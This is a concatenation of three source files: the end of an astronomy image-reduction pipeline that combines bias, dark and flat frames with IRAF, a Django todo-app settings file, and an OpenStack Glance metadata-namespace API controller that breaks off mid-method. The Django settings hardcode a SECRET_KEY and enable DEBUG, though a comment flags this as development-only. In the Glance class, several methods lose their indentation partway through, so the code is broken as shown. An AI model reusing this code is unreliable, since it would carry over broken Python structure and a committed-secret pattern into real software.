        self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list())
    def load_dark(self):
        """Loading Dark Frames"""
        # Load individual dark frames.
        self.dark = ImageStack()
        self.load_type("Dark",self.dark)
        # Set Header Values for each image.
        for frame in self.dark.values():
            frame.header.update('IMAGETYP','dark')
            self.log.debug("Set IMAGETYP=dark for frame %s" % frame)
        self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list())
    def load_flat(self):
        """Loading Flat Frames"""
        # Load individual flat frames.
        self.flat = ImageStack()
        self.load_type("Flat",self.flat)
        # Set Header Values for each image.
        for frame in self.flat.values():
            frame.header.update('IMAGETYP','flat')
            self.log.debug("Set IMAGETYP=flat for frame %s" % frame)
        # Fixed copy/paste bug: this previously logged self.dark.list().
        self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.flat.list())
    @help("Create bias frames from the configured bias list.")
    @depends("load-bias") # Declare a dependency on another stage: Method ``load_bias()``.
    def create_bias(self):
        """Creating Combined Bias Frame"""
        self.log.debug("Running iraf.zerocombine on image list...")
        iraf.unlearn(iraf.zerocombine)
        iraf.zerocombine(self.bias.iinat(),
            output=self.bias.iout("Bias"),
            combine=self.config["Bias.Combine"],
            ccdtype="zero",
            reject=self.config["Bias.Reject"],
            scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
        )
        self.bias.idone()
    @help("Create Dark Frames")
    @depends("load-dark")
    def create_dark(self):
        """Creating Combined Dark Frame"""
        self.log.debug("Running iraf.darkcombine on image list...")
        iraf.unlearn(iraf.darkcombine)
        iraf.darkcombine(self.dark.iraf.inatfile(),
            output=self.dark.iraf.outfile("Dark"),
            combine=self.config["Dark.Combine"],
            ccdtype="dark",
            reject=self.config["Dark.Reject"],
            process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
        )
        self.dark.iraf.done()
    @help("Create Flat Frames")
    @depends("load-flat")
    def create_flat(self):
        """Creating Combined Flat Frame"""
        # Fixed typo: "Runnign" -> "Running".
        self.log.debug("Running iraf.flatcombine on image list...")
        iraf.unlearn(iraf.flatcombine)
        iraf.flatcombine(self.flat.iraf.inatfile(),
            output=self.flat.iraf.outfile("Flat"),
            combine=self.config["Flat.Combine"],
            ccdtype="flat",
            reject=self.config["Flat.Reject"],
            scale=self.config["Flat.Scale"],
            process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1.")
        self.flat.iraf.done()
    def load_data(self):
        """Loading Raw Data into the system."""
        self.data = ImageStack()
        self.load_type("Data",self.data)
    @include # Set this stage as something to be run with the *all macro.
    @depends("create-bias","load-data")
    @help("Subtract Bias Frame")
    def subtract_bias(self):
        """Subtracting Bias Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.modatfile(),
            ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="yes", darkcor="no", flatcor ="no",
            zero=self.bias.iin("Bias"))
        self.data.idone()
    @include # Set this stage as something to be run with the *all macro.
    @depends("create-dark","load-data")
    @help("Subtract Dark Frame")
    def subtract_dark(self):
        """Subtracting Dark Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.modatfile(),
            ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", darkcor="yes", flatcor ="no",
            dark=self.dark.iin("Dark"))
        self.data.idone()
    @include # Set this stage as something to be run with the *all macro.
    @depends("create-flat","load-data")
    @help("Divide out flat frame")
    def divide_flat(self):
        """Dividing by Flat Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.inatfile(),
            output=self.data.iraf.outatfile(append="-Flat"),
            flat=self.flat.iin("Flat"),
            ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", flatcor="yes", darkcor ="no")
        self.data.iraf.done()
    # Since the simulator loads and runs stages in order, this stage will always
    # be run last.
    @include # Set this stage as something to be run with the *all macro.
    @depends("load-data")
    def save_file(self):
        """Save the new fits file"""
        self.data.write("DataFile.fits",frames=[self.data.framename],clobber=True)
    @help("Save Partial Images")
    @depends("create-flat","create-dark","create-bias")
    def save_partials(self):
        """Saving partial images"""
        # Master calibration frames are written to the paths configured under
        # <Type>.Master so later runs can reuse them.
        self.bias.write(frames=["Bias"],filename=self.config["Bias.Master"],clobber=True)
        self.dark.write(frames=["Dark"],filename=self.config["Dark.Master"],clobber=True)
        self.flat.write(frames=["Flat"],filename=self.config["Flat.Master"],clobber=True)
def main():
    """Command-line entry point: build the pipeline and run requested stages."""
    Pipeline().run()


if __name__ == '__main__':
    main()
| alexrudy/AstroObject | Examples/pipeline.py | Python | gpl-3.0 | 7,924 | 0.016406 |
"""
Django settings for todo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; any real deployment
# should load it from the environment or a secrets store instead.
SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty is acceptable while DEBUG is True; production must list served hosts.
ALLOWED_HOSTS = []
# Application definition
# Apps are grouped by origin so INSTALLED_APPS stays easy to audit.
DJANGO_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
# No third-party apps yet; kept as a named list for symmetry with the groups.
THIRD_PARTY_APPS = []
CUSTOM_APPS = [
    'tasks.apps.TasksConfig',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS
# NOTE(review): MIDDLEWARE_CLASSES (and SessionAuthenticationMiddleware) are
# the Django 1.9-era names; both change if this project upgrades — verify
# against the target Django release before upgrading.
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # Project-level template dir in addition to per-app template dirs.
        'DIRS': ['todo/templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
# SQLite file in the project root; fine for development.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| jacoboamn87/todolist | todo/settings.py | Python | gpl-3.0 | 3,308 | 0.001209 |
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client as http
import urllib.parse as urlparse
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import encodeutils
import webob.exc
from wsme.rest import json
from glance.api import policy
from glance.api.v2.model.metadef_namespace import Namespace
from glance.api.v2.model.metadef_namespace import Namespaces
from glance.api.v2.model.metadef_object import MetadefObject
from glance.api.v2.model.metadef_property_type import PropertyType
from glance.api.v2.model.metadef_resource_type import ResourceTypeAssociation
from glance.api.v2.model.metadef_tag import MetadefTag
from glance.api.v2 import policy as api_policy
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
from glance.common import wsme_utils
import glance.db
import glance.gateway
from glance.i18n import _, _LE
import glance.notifier
import glance.schema
# Module-level logger and global oslo.config handle used throughout.
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class NamespaceController(object):
    """v2 API controller for metadata-definition namespaces."""
    def __init__(self, db_api=None, policy_enforcer=None, notifier=None):
        """Wire up DB, policy and notifier collaborators (glance defaults)."""
        self.db_api = db_api or glance.db.get_api()
        self.policy = policy_enforcer or policy.Enforcer()
        self.notifier = notifier or glance.notifier.Notifier()
        self.gateway = glance.gateway.Gateway(db_api=self.db_api,
                                              notifier=self.notifier,
                                              policy_enforcer=self.policy)
        # Relative hrefs to the JSON schemas advertised in API responses.
        self.ns_schema_link = '/v2/schemas/metadefs/namespace'
        self.obj_schema_link = '/v2/schemas/metadefs/object'
        self.tag_schema_link = '/v2/schemas/metadefs/tag'
    def index(self, req, marker=None, limit=None, sort_key='created_at',
              sort_dir='desc', filters=None):
        """Return a paginated Namespaces collection visible to the caller.

        Policy is enforced per namespace: entries the caller may not see are
        silently filtered out rather than failing the whole listing.
        """
        try:
            ns_repo = self.gateway.get_metadef_namespace_repo(
                req.context, authorization_layer=False)
            policy_check = api_policy.MetadefAPIPolicy(
                req.context,
                enforcer=self.policy)
            # NOTE(abhishekk): This is just a "do you have permission to
            # list namespace" check. Each namespace is checked against
            # get_metadef_namespace below.
            policy_check.get_metadef_namespaces()
            # NOTE(abhishekk): We also need to fetch resource_types associated
            # with namespaces, so better to check we have permission for the
            # same in advance.
            policy_check.list_metadef_resource_types()
            # Get namespace id
            if marker:
                namespace_obj = ns_repo.get(marker)
                marker = namespace_obj.namespace_id
            database_ns_list = ns_repo.list(
                marker=marker, limit=limit, sort_key=sort_key,
                sort_dir=sort_dir, filters=filters)
            # Keep only namespaces the caller is allowed to view.
            ns_list = [
                ns for ns in database_ns_list if api_policy.MetadefAPIPolicy(
                    req.context, md_resource=ns, enforcer=self.policy).check(
                        'get_metadef_namespace')]
            rs_repo = (
                self.gateway.get_metadef_resource_type_repo(
                    req.context, authorization_layer=False))
            for db_namespace in ns_list:
                # Get resource type associations
                filters = dict()
                filters['namespace'] = db_namespace.namespace
                repo_rs_type_list = rs_repo.list(filters=filters)
                resource_type_list = [
                    ResourceTypeAssociation.to_wsme_model(
                        resource_type
                    ) for resource_type in repo_rs_type_list]
                if resource_type_list:
                    db_namespace.resource_type_associations = (
                        resource_type_list)
            namespace_list = [Namespace.to_wsme_model(
                db_namespace,
                get_namespace_href(db_namespace),
                self.ns_schema_link) for db_namespace in ns_list]
            namespaces = Namespaces()
            namespaces.namespaces = namespace_list
            # A full page implies there may be more results: expose a marker.
            if len(namespace_list) != 0 and len(namespace_list) == limit:
                namespaces.next = ns_list[-1].namespace
        except exception.Forbidden as e:
            LOG.debug("User not permitted to retrieve metadata namespaces "
                      "index")
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
        return namespaces
    @utils.mutating
    def create(self, req, namespace):
        """Create a namespace plus nested resource types/objects/tags/properties.

        If any nested create fails after the namespace row exists, the
        namespace is rolled back via _cleanup_namespace before the HTTP
        error is raised.
        """
        try:
            namespace_created = False
            # Create Namespace
            ns_factory = self.gateway.get_metadef_namespace_factory(
                req.context, authorization_layer=False)
            ns_repo = self.gateway.get_metadef_namespace_repo(
                req.context, authorization_layer=False)
            # NOTE(abhishekk): Here we are going to check if user is authorized
            # to create namespace, resource_types, objects, properties etc.
            policy_check = api_policy.MetadefAPIPolicy(
                req.context, enforcer=self.policy)
            policy_check.add_metadef_namespace()
            if namespace.resource_type_associations:
                policy_check.add_metadef_resource_type_association()
            if namespace.objects:
                policy_check.add_metadef_object()
            if namespace.properties:
                policy_check.add_metadef_property()
            if namespace.tags:
                policy_check.add_metadef_tag()
            # NOTE(abhishekk): As we are getting rid of auth layer, this
            # is the place where we should add owner if it is not specified
            # in request.
            kwargs = namespace.to_dict()
            if 'owner' not in kwargs:
                kwargs.update({'owner': req.context.owner})
            new_namespace = ns_factory.new_namespace(**kwargs)
            ns_repo.add(new_namespace)
            namespace_created = True
            # Create Resource Types
            if namespace.resource_type_associations:
                rs_factory = (self.gateway.get_metadef_resource_type_factory(
                    req.context, authorization_layer=False))
                rs_repo = self.gateway.get_metadef_resource_type_repo(
                    req.context, authorization_layer=False)
                for resource_type in namespace.resource_type_associations:
                    new_resource = rs_factory.new_resource_type(
                        namespace=namespace.namespace,
                        **resource_type.to_dict())
                    rs_repo.add(new_resource)
            # Create Objects
            if namespace.objects:
                object_factory = self.gateway.get_metadef_object_factory(
                    req.context, authorization_layer=False)
                object_repo = self.gateway.get_metadef_object_repo(
                    req.context, authorization_layer=False)
                for metadata_object in namespace.objects:
                    new_meta_object = object_factory.new_object(
                        namespace=namespace.namespace,
                        **metadata_object.to_dict())
                    object_repo.add(new_meta_object)
            # Create Tags
            if namespace.tags:
                tag_factory = self.gateway.get_metadef_tag_factory(
                    req.context, authorization_layer=False)
                tag_repo = self.gateway.get_metadef_tag_repo(
                    req.context, authorization_layer=False)
                for metadata_tag in namespace.tags:
                    new_meta_tag = tag_factory.new_tag(
                        namespace=namespace.namespace,
                        **metadata_tag.to_dict())
                    tag_repo.add(new_meta_tag)
            # Create Namespace Properties
            if namespace.properties:
                prop_factory = (self.gateway.get_metadef_property_factory(
                    req.context, authorization_layer=False))
                prop_repo = self.gateway.get_metadef_property_repo(
                    req.context, authorization_layer=False)
                for (name, value) in namespace.properties.items():
                    new_property_type = (
                        prop_factory.new_namespace_property(
                            namespace=namespace.namespace,
                            **self._to_property_dict(name, value)
                        ))
                    prop_repo.add(new_property_type)
        except exception.Invalid as e:
            msg = (_("Couldn't create metadata namespace: %s")
                   % encodeutils.exception_to_unicode(e))
            raise webob.exc.HTTPBadRequest(explanation=msg)
        except exception.Forbidden as e:
            self._cleanup_namespace(ns_repo, namespace, namespace_created)
            LOG.debug("User not permitted to create metadata namespace")
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            self._cleanup_namespace(ns_repo, namespace, namespace_created)
            raise webob.exc.HTTPNotFound(explanation=e.msg)
        except exception.Duplicate as e:
            self._cleanup_namespace(ns_repo, namespace, namespace_created)
            raise webob.exc.HTTPConflict(explanation=e.msg)
        # Return the user namespace as we don't expose the id to user
        new_namespace.properties = namespace.properties
        new_namespace.objects = namespace.objects
        new_namespace.resource_type_associations = (
            namespace.resource_type_associations)
        new_namespace.tags = namespace.tags
        return Namespace.to_wsme_model(new_namespace,
                                       get_namespace_href(new_namespace),
                                       self.ns_schema_link)
def _to_property_dict(self, name, value):
# Convert the model PropertyTypes dict to a JSON string
db_property_type_dict = dict()
db_property_type_dict['schema'] = json.tojson(PropertyType, value)
db_property_type_dict['name'] = name
return db_property_type_dict
def _cleanup_namespace(self, namespace_repo, namespace, namespace_created):
if namespace_created:
try:
namespace_obj = namespace_repo.get(namespace.namespace)
namespace_obj.delete()
namespace_repo.remove(namespace_obj)
LOG.debug("Cleaned up namespace %(namespace)s ",
{'namespace': namespace.namespace})
except Exception as e:
msg = (_LE("Failed to delete namespace %(namespace)s."
"Exception: %(exception)s"),
{'namespace': namespace.namespace,
'exception': encodeutils.exception_to_unicode(e)})
LOG.error(msg)
    def show(self, req, namespace, filters=None):
        """Return full namespace detail: objects, resource types, properties, tags.

        A namespace the caller may not view is reported as 404 (not 403) so
        its existence is not leaked.
        """
        try:
            # Get namespace
            ns_repo = self.gateway.get_metadef_namespace_repo(
                req.context, authorization_layer=False)
            try:
                namespace_obj = ns_repo.get(namespace)
                policy_check = api_policy.MetadefAPIPolicy(
                    req.context,
                    md_resource=namespace_obj,
                    enforcer=self.policy)
                policy_check.get_metadef_namespace()
            except (exception.Forbidden, webob.exc.HTTPForbidden):
                LOG.debug("User not permitted to show namespace '%s'",
                          namespace)
                # NOTE (abhishekk): Returning 404 Not Found as the
                # namespace is outside of this user's project
                raise webob.exc.HTTPNotFound()
            # NOTE(abhishekk): We also need to fetch resource_types, objects,
            # properties, tags associated with namespace, so better to check
            # whether user has permissions for the same.
            policy_check.list_metadef_resource_types()
            policy_check.get_metadef_objects()
            policy_check.get_metadef_properties()
            policy_check.get_metadef_tags()
            namespace_detail = Namespace.to_wsme_model(
                namespace_obj,
                get_namespace_href(namespace_obj),
                self.ns_schema_link)
            ns_filters = dict()
            ns_filters['namespace'] = namespace
            # Get objects
            object_repo = self.gateway.get_metadef_object_repo(
                req.context, authorization_layer=False)
            db_metaobject_list = object_repo.list(filters=ns_filters)
            object_list = [MetadefObject.to_wsme_model(
                db_metaobject,
                get_object_href(namespace, db_metaobject),
                self.obj_schema_link) for db_metaobject in db_metaobject_list]
            if object_list:
                namespace_detail.objects = object_list
            # Get resource type associations
            rs_repo = self.gateway.get_metadef_resource_type_repo(
                req.context, authorization_layer=False)
            db_resource_type_list = rs_repo.list(filters=ns_filters)
            resource_type_list = [ResourceTypeAssociation.to_wsme_model(
                resource_type) for resource_type in db_resource_type_list]
            if resource_type_list:
                namespace_detail.resource_type_associations = (
                    resource_type_list)
            # Get properties
            prop_repo = self.gateway.get_metadef_property_repo(
                req.context, authorization_layer=False)
            db_properties = prop_repo.list(filters=ns_filters)
            property_list = Namespace.to_model_properties(db_properties)
            if property_list:
                namespace_detail.properties = property_list
            # When filtered by resource type, property names are shown with
            # that association's prefix prepended.
            if filters and filters['resource_type']:
                namespace_detail = self._prefix_property_name(
                    namespace_detail, filters['resource_type'])
            # Get tags
            tag_repo = self.gateway.get_metadef_tag_repo(
                req.context, authorization_layer=False)
            db_metatag_list = tag_repo.list(filters=ns_filters)
            tag_list = [MetadefTag(**{'name': db_metatag.name})
                        for db_metatag in db_metatag_list]
            if tag_list:
                namespace_detail.tags = tag_list
        except exception.Forbidden as e:
            LOG.debug("User not permitted to show metadata namespace "
                      "'%s'", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
        return namespace_detail
    def update(self, req, user_ns, namespace):
        """Replace namespace attributes with values from *user_ns*.

        Unspecified optional fields fall back to the create-time defaults
        (private/unprotected/caller-owned) rather than being preserved.
        """
        namespace_repo = self.gateway.get_metadef_namespace_repo(
            req.context, authorization_layer=False)
        try:
            ns_obj = namespace_repo.get(namespace)
        except (exception.Forbidden, exception.NotFound):
            # NOTE (abhishekk): Returning 404 Not Found as the
            # namespace is outside of this user's project
            msg = _("Namespace %s not found") % namespace
            raise webob.exc.HTTPNotFound(explanation=msg)
        try:
            # NOTE(abhishekk): Here we are just checking if use is authorized
            # to modify the namespace or not
            api_policy.MetadefAPIPolicy(
                req.context,
                md_resource=ns_obj,
                enforcer=self.policy).modify_metadef_namespace()
            # Remember the pre-update name; the namespace itself may be renamed.
            ns_obj._old_namespace = ns_obj.namespace
            ns_obj.namespace = wsme_utils._get_value(user_ns.namespace)
            ns_obj.display_name = wsme_utils._get_value(user_ns.display_name)
            ns_obj.description = wsme_utils._get_value(user_ns.description)
            # Following optional fields will default to same values as in
            # create namespace if not specified
            ns_obj.visibility = (
                wsme_utils._get_value(user_ns.visibility) or 'private')
            ns_obj.protected = (
                wsme_utils._get_value(user_ns.protected) or False)
            ns_obj.owner = (
                wsme_utils._get_value(user_ns.owner) or req.context.owner)
            updated_namespace = namespace_repo.save(ns_obj)
        except exception.Invalid as e:
            msg = (_("Couldn't update metadata namespace: %s")
                   % encodeutils.exception_to_unicode(e))
            raise webob.exc.HTTPBadRequest(explanation=msg)
        except exception.Forbidden as e:
            LOG.debug("User not permitted to update metadata namespace "
                      "'%s'", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
        except exception.Duplicate as e:
            raise webob.exc.HTTPConflict(explanation=e.msg)
        return Namespace.to_wsme_model(updated_namespace,
                                       get_namespace_href(updated_namespace),
                                       self.ns_schema_link)
    def delete(self, req, namespace):
        """Delete a namespace; 404 when unknown or outside the caller's project."""
        namespace_repo = self.gateway.get_metadef_namespace_repo(
            req.context, authorization_layer=False)
        try:
            namespace_obj = namespace_repo.get(namespace)
        except (exception.Forbidden, exception.NotFound):
            # NOTE (abhishekk): Returning 404 Not Found as the
            # namespace is outside of this user's project
            msg = _("Namespace %s not found") % namespace
            raise webob.exc.HTTPNotFound(explanation=msg)
        try:
            # NOTE(abhishekk): Here we are just checking user is authorized to
            # delete the namespace or not.
            api_policy.MetadefAPIPolicy(
                req.context,
                md_resource=namespace_obj,
                enforcer=self.policy).delete_metadef_namespace()
            namespace_obj.delete()
            namespace_repo.remove(namespace_obj)
        except exception.Forbidden as e:
            LOG.debug("User not permitted to delete metadata namespace "
                      "'%s'", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
    def delete_objects(self, req, namespace):
        """Delete all metadata objects belonging to a namespace."""
        ns_repo = self.gateway.get_metadef_namespace_repo(
            req.context, authorization_layer=False)
        try:
            namespace_obj = ns_repo.get(namespace)
        except (exception.Forbidden, exception.NotFound):
            # NOTE (abhishekk): Returning 404 Not Found as the
            # namespace is outside of this user's project
            msg = _("Namespace %s not found") % namespace
            raise webob.exc.HTTPNotFound(explanation=msg)
        try:
            # NOTE(abhishekk): This call currently checks whether user
            # has permission to delete the namespace or not before deleting
            # the objects associated with it.
            api_policy.MetadefAPIPolicy(
                req.context,
                md_resource=namespace_obj,
                enforcer=self.policy).delete_metadef_namespace()
            namespace_obj.delete()
            ns_repo.remove_objects(namespace_obj)
        except exception.Forbidden as e:
            LOG.debug("User not permitted to delete metadata objects "
                      "within '%s' namespace", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
    def delete_tags(self, req, namespace):
        """Delete all tags belonging to a namespace."""
        ns_repo = self.gateway.get_metadef_namespace_repo(
            req.context, authorization_layer=False)
        try:
            namespace_obj = ns_repo.get(namespace)
        except (exception.Forbidden, exception.NotFound):
            # NOTE (abhishekk): Returning 404 Not Found as the
            # namespace is outside of this user's project
            msg = _("Namespace %s not found") % namespace
            raise webob.exc.HTTPNotFound(explanation=msg)
        try:
            # NOTE(abhishekk): This call currently checks whether user
            # has permission to delete the namespace or not before deleting
            # the objects associated with it.
            policy_check = api_policy.MetadefAPIPolicy(
                req.context,
                md_resource=namespace_obj,
                enforcer=self.policy)
            policy_check.delete_metadef_namespace()
            # NOTE(abhishekk): This call checks whether user
            # has permission to delete the tags or not.
            policy_check.delete_metadef_tags()
            namespace_obj.delete()
            ns_repo.remove_tags(namespace_obj)
        except exception.Forbidden as e:
            LOG.debug("User not permitted to delete metadata tags "
                      "within '%s' namespace", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
    def delete_properties(self, req, namespace):
        """Delete all properties belonging to a namespace."""
        ns_repo = self.gateway.get_metadef_namespace_repo(
            req.context, authorization_layer=False)
        try:
            namespace_obj = ns_repo.get(namespace)
        except (exception.Forbidden, exception.NotFound):
            # NOTE (abhishekk): Returning 404 Not Found as the
            # namespace is outside of this user's project
            msg = _("Namespace %s not found") % namespace
            raise webob.exc.HTTPNotFound(explanation=msg)
        try:
            # NOTE(abhishekk): This call currently checks whether user
            # has permission to delete the namespace or not before deleting
            # the objects associated with it.
            api_policy.MetadefAPIPolicy(
                req.context,
                md_resource=namespace_obj,
                enforcer=self.policy).delete_metadef_namespace()
            namespace_obj.delete()
            ns_repo.remove_properties(namespace_obj)
        except exception.Forbidden as e:
            LOG.debug("User not permitted to delete metadata properties "
                      "within '%s' namespace", namespace)
            raise webob.exc.HTTPForbidden(explanation=e.msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.msg)
def _prefix_property_name(self, namespace_detail, user_resource_type):
prefix = None
if user_resource_type and namespace_detail.resource_type_associations:
for resource_type in namespace_detail.resource_type_associations:
if resource_type.name == user_resource_type:
prefix = resource_type.prefix
break
if prefix:
if namespace_detail.properties:
new_property_dict = dict()
for (key, value) in namespace_detail.properties.items():
new_property_dict[prefix + key] = value
namespace_detail.properties = new_property_dict
if namespace_detail.objects:
for object in namespace_detail.objects:
new_object_property_dict = dict()
for (key, value) in object.properties.items():
new_object_property_dict[prefix + key] = value
object.properties = new_object_property_dict
if object.required and len(object.required) > 0:
required = [prefix + name for name in object.required]
object.required = required
return namespace_detail
class RequestDeserializer(wsgi.JSONRequestDeserializer):
    """Deserializes and validates incoming metadef-namespace API requests."""
    # Server-managed fields a client body may never set.
    _disallowed_properties = ['self', 'schema', 'created_at', 'updated_at']
    def __init__(self, schema=None):
        super(RequestDeserializer, self).__init__()
        self.schema = schema or get_schema()
    def _get_request_body(self, request):
        """Return the decoded JSON body, or raise 400 when none was sent."""
        output = super(RequestDeserializer, self).default(request)
        if 'body' not in output:
            msg = _('Body expected in request.')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return output['body']
    @classmethod
    def _check_allowed(cls, image):
        """Raise 403 when the body tries to set a read-only field."""
        for key in cls._disallowed_properties:
            if key in image:
                msg = _("Attribute '%s' is read-only.") % key
                raise webob.exc.HTTPForbidden(explanation=msg)
    def index(self, request):
        """Extract and validate paging/sorting/filter query parameters."""
        params = request.params.copy()
        limit = params.pop('limit', None)
        marker = params.pop('marker', None)
        sort_dir = params.pop('sort_dir', 'desc')
        if limit is None:
            limit = CONF.limit_param_default
        # BUG FIX: validate before converting so a malformed 'limit' (e.g.
        # ?limit=abc) yields HTTP 400 instead of an uncaught ValueError (500).
        limit = min(CONF.api_limit_max, self._validate_limit(limit))
        query_params = {
            'sort_key': params.pop('sort_key', 'created_at'),
            'sort_dir': self._validate_sort_dir(sort_dir),
            'filters': self._get_filters(params)
        }
        if marker is not None:
            query_params['marker'] = marker
        if limit is not None:
            query_params['limit'] = limit
        return query_params
    def _validate_sort_dir(self, sort_dir):
        """Return *sort_dir* if valid; raise 400 otherwise."""
        if sort_dir not in ['asc', 'desc']:
            msg = _('Invalid sort direction: %s') % sort_dir
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return sort_dir
    def _get_filters(self, filters):
        """Validate filter values (currently only 'visibility')."""
        visibility = filters.get('visibility')
        if visibility:
            if visibility not in ['public', 'private']:
                msg = _('Invalid visibility value: %s') % visibility
                raise webob.exc.HTTPBadRequest(explanation=msg)
        return filters
    def _validate_limit(self, limit):
        """Return *limit* as a non-negative int; raise 400 otherwise."""
        try:
            limit = int(limit)
        except ValueError:
            msg = _("limit param must be an integer")
            raise webob.exc.HTTPBadRequest(explanation=msg)
        if limit < 0:
            msg = _("limit param must be positive")
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return limit
    def show(self, request):
        """Extract validated filters for a namespace detail request."""
        params = request.params.copy()
        query_params = {
            'filters': self._get_filters(params)
        }
        return query_params
    def create(self, request):
        """Validate the body against the schema; return a Namespace model."""
        body = self._get_request_body(request)
        self._check_allowed(body)
        try:
            self.schema.validate(body)
        except exception.InvalidObject as e:
            raise webob.exc.HTTPBadRequest(explanation=e.msg)
        namespace = json.fromjson(Namespace, body)
        return dict(namespace=namespace)
    def update(self, request):
        """Validate the body against the schema; return the updated model."""
        body = self._get_request_body(request)
        self._check_allowed(body)
        try:
            self.schema.validate(body)
        except exception.InvalidObject as e:
            raise webob.exc.HTTPBadRequest(explanation=e.msg)
        namespace = json.fromjson(Namespace, body)
        return dict(user_ns=namespace)
class ResponseSerializer(wsgi.JSONResponseSerializer):
    """Renders namespace controller results as JSON HTTP responses."""
    def __init__(self, schema=None):
        super(ResponseSerializer, self).__init__()
        self.schema = schema
    def __render(self, json_data, response, response_status=None):
        """Write *json_data* onto *response*, optionally setting its status."""
        response.unicode_body = jsonutils.dumps(json_data, ensure_ascii=False)
        response.content_type = 'application/json'
        if response_status:
            response.status_int = response_status
        return response
    def create(self, response, namespace):
        rendered = self.__render(
            json.tojson(Namespace, namespace), response, http.CREATED)
        # Location header points at the newly created namespace.
        rendered.location = get_namespace_href(namespace)
    def show(self, response, namespace):
